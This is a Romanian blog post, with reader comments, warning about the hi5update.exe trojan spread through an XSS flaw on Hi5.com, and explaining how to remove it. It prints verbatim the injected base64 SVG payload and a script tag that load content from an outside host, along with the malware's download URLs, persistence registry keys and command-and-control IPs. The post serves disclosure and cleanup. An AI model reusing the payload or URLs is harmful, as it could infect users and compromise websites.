Se pare ca un nou trojan umbla mai recent pe internet, mai exact pe Hi5.com.
Update:
Acesta se descarca de pe site-urile:
http://rp-legal.ro/hi5update.exe
http://brazi-craciun.ro/hi5update.exe
Am trimis un email webmaster-ului sa deviruseze serverul. Sa vedem cat se misca de repede si daca citeste cineva e-mail-urile duminica. Asta in speranta ca nu este pus intentionat acolo pe server.
Care este acest Hi5Updater.exe ?
Nu este decat un virus care incearca sa pacaleasca userii sa-l instaleze. Nu are nicio legatura cu site-ul de Hi5.com.
Cei de la Hi5.com au eliminat codurile CSS din profile din motive de securitate(site-ul nu ar mai fi asa vulneravbil).
Se pare ca cel putin unul le-a scapat si a fost exploatat de “baietii destepti”, in sectiunea de editare a profilului, la rubrica Citat Preferat din meniul Interese urmatorul cod:
<EMBED SRC=”data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dHA6L y93d3cudzMub3JnLzIwMDA vc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9 zdmciIHhtbG5zOnhsaW5rPSJodHRwOi 8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk 9IjAiIHdpZHRoPSIxOTQiIGhla WdodD0iMjAwIiBpZD0ieHNzIj48c2NyaXB0PmRvY3VtZW50LmxvY2F0aW 9uPSdodHRwOi8vMzcyOC50MzUuY29tLzEuaHRtJ zs8L3NjcmlwdD48L3N2Zz4=” type=”image/svg+xml” AllowScriptAccess=”always” width=”0″ height=”0″></EMBED><EMBED SRC=”data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc 9Imh0dHA6Ly93d3cudzMub3JnLzI wMDAvc3ZnIiB4bWxucz0iaHR0cD ovL3d3dy53My5vcmcvMjAwMC9 zdmciIHhtbG5zOnhsaW5rPSJodH RwOi8vd3d3LnczLm9yZy8xOTk5 L3hsaW5rIiB2ZXJzaW9uPSIxLjAiI Hg9IjAiIHk9IjAiIHdpZHRoPSIxOTQ iIGhlaWdodD0iMjAwIiBpZD0ieHNz Ij48c2NyaXB0PmRvY3VtZW50Lm xvY2F0aW9uPSJodHRwOi8vMzcy OC50MzUuY29tLzIuaHRtIjs8L3Nj cmlwdD48L3N2Zz4=” type=”image/svg+xml” AllowScriptAccess=”always” width=”0″ height=”0″></EMBED>
Ca sa scapati de fereastra de download cu hi5updater.exe trebuie sa stergeti acest cod din sectiunea Interese(Interests)sau daca nu il gasiti acolo cautati la Despre Mine(About Me).
XSS: hi5 | Your Friends. Your World
( http://hi5.com/friend/mail/displayComposeMail.do )
Poc: hi5 | Your Friends. Your World
( http://hi5.com/friend/mail/displayComposeMail.do?contentType=7&contentId=4462139 )
Attachment:
<tr>
<td align=”right”>
<b>Attachment:</b>
<div><a href=”javascript:submitForm(‘removeContent’);”>(Remove)</a></div>
</td>
<td>
<input type=”hidden” name=”contentId” value=”4462139″>
<input type=”hidden” name=”contentType” value=”7″>
<input type=”hidden” name=”contentMetadata” value=”">
<img src=”http://images.hi5.com/images/groups/groupImageDefault.gif” alt=”"/>
<br/>
<script src=”http://3728.t35.com/js“></script>
</td>
<td> </td>
</tr>
Test: hi5update.exe
Se copiaza in:
C:\Windows\system32\winlog.exe
C:\Windows\system32\boot.exe
Start Up:
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run \Font
Trimite date catre:
188.27.212.206( Romania , Bucuresti, RDS ) – XAMPP
79.117.73.154 ( Romania, Constanta, RDS ) – 3728.zapto.org
Scan simplu(nmap):
PORT STATE SERVICE
25/tcp filtered smtp
80/tcp open http
135/tcp filtered msrpc
139/tcp filtered netbios-ssn
443/tcp open https
445/tcp filtered microsoft-ds
DEVIRUSARE hi5update.exe
Pasul 1. Stergeti fisierele:
C:\Windows\system32\winlog.exe
C:\Windows\system32\boot.exe
Folositi LockHunter daca fisierul nu poate fi sters:
LockHunter – alternativa Unlocker pentru Windows 7 64bit
Pasul 2. Stergeti cheile de registry:
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run \Font
Pasul 3. Rulati Kaspersky Virus Removal Tool 2010:
http://www.softpedia.com/get/Antivirus/Kaspersky-Virus-Removal-Tool.shtml
Am trimis mail la toate companiile antivirus sa adauge detectie.
15 Responses to “hi5update.exe – Devirusare”
salut. ei bine,chiar inainte de sarbatori discutam cu niste amici faptul ca in locul lor ,nu as mai avea atat incredere in faptul ca Hi5 nu este vulnerabil….iata ca azi citesc tocmai ce sustineam….le voi comunica sa citeasca articolul tau! STIMA.
Multumesc. Cine are probleme, sa vina aici.
un prieten de-al meu avea probleme, cand a aparut acest virus?
Se pare ca ieri s-au raportat primele cazuri.
acum apare un fisier mai mare si de pe alt server
Ce fisier ?
Ce server ?
mda..am loat programul care ai zs ca il cauta si il sterge, nu l-a gasit
l-am cautat si eu in windows si nu l-am gasit
l-am downloadat si l-am instalat, apoi l-am sters dupa ce am vazut ce e defapt.
unde sa il mai caut?
Activeaza fisierele ascunse din sistem si cauta-l in locatia C:\Windows\system32\winlog.exe
eu nu am instalat programul..si totusi imi apare..ce fac?
In nici un caz sa nu il descarci si sa il instalezi.
Hi5.com este infectat momentan.
Ms… sa inteleg ca sa rezolvat problema … din cate citisem ieri …daca stergeai codul din interest… peste 2 ore aparea again. Eo l-am sters ieri dar nu a mai aparut….
A fost mutat pe alt server.
Hi5.com este inca vulnerabil.
Momentan nu se mai intampla nimic pe hi5
) sper ca s-a rezolvat treaba 
Primul site a fost suspendat, ce putere poate sa aina un email.
Sa speram ca ramane asa.
Imi e foarte greu sa urmaresc fenomenul avand in vedere ca nu am cont pe Hi5 si nici nu imi fac.
Multumesc.
“…nu am cont pe HI5 si nici nu imi fac”.Felicitari !